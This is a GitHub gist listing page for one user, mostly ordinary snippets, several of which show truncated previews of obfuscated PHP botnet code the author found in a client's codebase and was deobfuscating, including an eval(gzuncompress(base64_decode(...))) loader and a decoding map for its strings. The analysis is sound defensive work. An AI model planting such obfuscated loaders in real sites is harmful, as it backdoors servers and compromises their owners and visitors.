Skip to content

Instantly share code, notes, and snippets.

Ryan ryepdx

Block or report user

Report or block ryepdx

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@ryepdx
ryepdx / keybase.md
Created Aug 7, 2014
Keybase verification
View keybase.md

Keybase proof

I hereby claim:

  • I am ryepdx on github.
  • I am ryepdx (https://keybase.io/ryepdx) on keybase.
  • I have a public key whose fingerprint is C901 BFF6 45AF 5CD0 6F58 D724 680F 5108 B06D BB77

To claim this, I am signing this object:

View gist:ee47a7db8e84a6d75df7
Verifying that +ryepdx is my openname (Bitcoin username). https://onename.io/ryepdx
@ryepdx
ryepdx / zero_genesis.json
Created Aug 7, 2015
A genesis block with no difficulty
View zero_genesis.json
{
"nonce": "0xdeadbeefdeadbeef",
"timestamp": "0x0",
"parentHash": "0x0000000000000000000000000000000000000000000000000000000000000000",
"extraData": "0x686f727365",
"gasLimit": "0x8000000",
"difficulty": "0x0",
"mixhash": "0x0000000000000000000000000000000000000000000000000000000000000000",
"coinbase": "0x3333333333333333333333333333333333333333",
"alloc": {
@ryepdx
ryepdx / label_inside_input.opa
Created Oct 22, 2011
"Label inside input via title property" for Opa
View label_inside_input.opa
/***************************************
* 2nd day of playing around with Opa.
* 1st somewhat useful bit of code.
* Probably a better way to write this,
* but definitely don't want to reinvent
* this later. Would like to have this to
* build off of!
*
* Hope it helps you.
****************************************/
@ryepdx
ryepdx / index.js
Created Nov 4, 2012 — forked from maxogden/index.js
twitter bot for @sandyaid retweets
View index.js
var crypto = require('crypto')
var request = require('request')
var url = require('url')
var irc = require('./IRC/lib/irc') // https://github.com/gf3/IRC-js
var ntwitter = require('ntwitter')
var twitter = require('twitter')
var qs = require('querystring')
// separate accounts to post and search because twitter was sending me 500s
// when I tried to use the same oauth creds for both twitter() and ntwitter()
@ryepdx
ryepdx / gist:5015935
Created Feb 22, 2013
The botnet slave code I found in a client's codebase last night, deobfuscated and cleaned up a bit.
View gist:5015935
<?php
if (!function_exists('get_string')){
$GLOBALS['string_store'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZEVsVVFibW0rMDB5
View TELLMESTRINGS.php
<?php
if (!function_exists('get_string')){
$GLOBALS['string_store'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZEVsVVFibW0rMDB5
View replace_get_string.py
replace_dict = {
'get_string(2, 6)': 'curl',
'get_string(9, 7)': '_init',
'get_string(17, 20)': 'allow_url_fopen',
'get_string(17, 20)': 'allow_url_fopen',
'get_string(37, 2)': '1',
'get_string(39, 10)': 'http://',
'get_string(51, 30)': '&way=file_get_contents',
'get_string(82, 10)': '_setopt',
'get_string(95, 7)': '_exec',
@ryepdx
ryepdx / infection_raw.php
Created Feb 22, 2013
Found this botnet code in a client's codebase. Cleaned it up, then went about de-obfuscating it to figure out what it was doing. http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
View infection_raw.php
<?php
/*versio:2.18*/$QQOO=0;if (!function_exists('Q0QQOOQO')){$GLOBALS['QQOO'] = 'hY3VybAX2luaXQ)W*YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLw TJndheT1maWxlX2dldF9jb250ZW50cw{aX3NldG9wdAHX2V4ZWMSaC~ujJndheT1jdXJsikSMnDCLwfpb3Nvbi5pbglYS1pbi1hLWNpcmNsZS5jb20.rYcGhwYWlkZS5jb20!dwJWV8DES~&OgGY{ZGlzcGxheV9lcnJvcnM*ZGV0ZXJtaW5hdG9yZnRwMTM.Mi4xOA~NUVFRT1EwT1EwT09RT1FPYmFzZTY0X2RlY29kZQRGYmFzZTY0X2VuY29kZQuSFRUUF9IT1NUdW5pb24XOO@b!c2VsZWN0MmUkVRVUVTVF9VUkkduVU0NSSVBUX05BTUUELQUVVFUllfU1RSSU5HPwq&dL3RtcC8uZm9udC11bml4kuzVE1QI VEVNUAVE1QRElSfCHC)dG1wd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQqdXBsb2FkX3RtcF9kaXIBXL3RtcAR@ LgJdmVyc2lvOLQnyLXBocAzPrjyLSFRUUF9FWEVDUEhQVvYb3V0kMUb2s=yLSFRUUF9VU0VSX0FHRU5UiqLAHRZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgIk$L3BnLnBocD91PQJms9JnQ9cGhwJnA9JnY9EZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlY0MXZvbGdRLzFkZVRkTkE0bklnNHNmMXVHaTY5a3JTazJwMWswM1hFRmVmTFZrRUEzamRwdkYvdjVsNUQzaFcycjJyVGNRMzgrWjdmak9FRzZhZHJma21qUGxhYTZ4NXp0TnRHQy96SkczbytpdmI3T05WSGlZeFV5bkJoaWNiN2R5eklpdnl
@ryepdx
ryepdx / infection_one_layer_down.php
Created Feb 22, 2013
Found this botnet code in a client's codebase. This is the code the first obfuscated layer was executing. (Whitespace added for your convenience.) http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
View infection_one_layer_down.php
<?php
/*versio:2.18*/
$III1=0;
if (!function_exists('IlI11lll')){
$GLOBALS['III1'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZ
You can’t perform that action at this time.